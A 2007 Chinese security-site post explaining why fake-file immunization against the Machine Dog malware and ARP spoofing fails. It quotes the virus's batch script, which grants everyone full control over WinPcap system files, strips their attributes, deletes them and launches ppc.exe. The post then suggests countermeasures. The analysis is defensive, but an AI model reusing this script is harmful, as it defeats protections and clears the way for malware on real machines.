发表您的文章 | 站内搜索 | 软件下载 | 技术论坛 | 网站地图
热门关键字:  radmin  冰点  arp  ghost  P2P终结者

机器狗以及ARP攻击免疫失效的原因

来源: 作者: 点击:loading... 时间:2007-11-26 Tag:
以下为引用的内容:
cacls %systemroot%\system32\drivers\npf.sys /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\npptools.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\Packet.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\WanPacket.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\wpcap.dll /e /p everyone:f
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\npptools.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\Packet.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\wpcap.dll
ping 127.0.0.1
rd %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
rd %systemroot%\system32\npptools.dll
ping 127.0.0.1
rd %systemroot%\system32\Packet.dll
ping 127.0.0.1
rd %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
rd %systemroot%\system32\wpcap.dll
ping 127.0.0.1
Del %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
Del %systemroot%\system32\npptools.dll
ping 127.0.0.1
Del %systemroot%\system32\Packet.dll
ping 127.0.0.1
Del %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
Del %systemroot%\system32\wpcap.dll
ping 127.0.0.1
ppc.exe
Exit



简单说一下,原因就是,病毒释放随机批处理,首先去掉NTFS权限,
进一步去掉文件属性
再进一步删掉空文件夹
最后删掉空文件
最后运行ARP欺骗的病毒.厉害吧,呵呵,所以假文件免疫的,不要再自欺欺人了.

 

更进一步,可以删掉cacls等外部命令,再禁止cmd,再更改bat文件关联.又可以防一时,如果病毒用程序达到以上目的,不需要批处理的话,那又没办法了.


上一篇:没有了
下一篇:没有了
最新评论共有 13 位网友发表了评论
发表评论
评论内容:不能超过250字,网上网下行为一致,尊重他人就是尊重自己。
用户名:
未注册?
注册